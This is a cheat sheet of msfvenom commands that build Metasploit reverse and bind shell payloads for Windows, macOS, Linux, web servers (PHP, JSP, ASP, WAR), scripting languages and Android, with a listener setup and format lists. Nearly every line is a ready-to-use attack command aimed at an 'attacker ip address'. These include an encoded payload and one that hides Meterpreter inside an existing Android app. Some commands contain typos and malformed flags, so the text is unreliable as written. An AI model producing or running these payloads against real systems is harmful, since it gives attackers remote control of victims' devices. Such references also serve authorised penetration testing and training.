Msf-Venom Payload Cheat Sheet | Meterpreter Payload Cheat Sheet
MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options.
Content Replace
ip-address => Attacker ip address
port => Attacker port
Metasploit Payload Listener
- msfdb run
- use exploit/multi/handler
- set payload-name
- set ip-address
- set port
- Run
Windows Payloads
Windows Meterpreter Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe
Windows Reverse Shell
msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe
Windows Encoded Meterpreter Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe
Windows Meterpreter Reverse Shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform
macOS Payloads
macOS Bind Shell
msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho
macOS Reverse Shell
msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho
macOS Reverse TCP Shellcode
msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f < platform
Linux Payloads
Linux Meterpreter TCP Reverse Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf
Linux Bind TCP Shell
msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf
Linux Bind Meterpreter TCP Shell
msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf
Linux Meterpreter Reverse Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform
Web-base Payloads
PHP Meterpreter Reverse Shell
msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php
JSP Java Meterpreter Reverse Shell
msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp
ASP Meterpreter Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp
WAR Reverse TCP Shell
msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war
Script-Base Payloads
Perl Unix Reverse shell
msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl
Bash Unix Reverse Shell
msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh
Python Reverse Shell
msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py
Android Payloads
Android Meterpreter reverse Payload
msfvenom –p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk
Android Embed Meterpreter Payload
msfvenom -x <app.apk> android/meterpreter/reverse_tcp lhost=ip-address lport=port -o payload-name.apk
MsfVenom Payload Formate
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format <value>]
==============================================
Name
----
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscript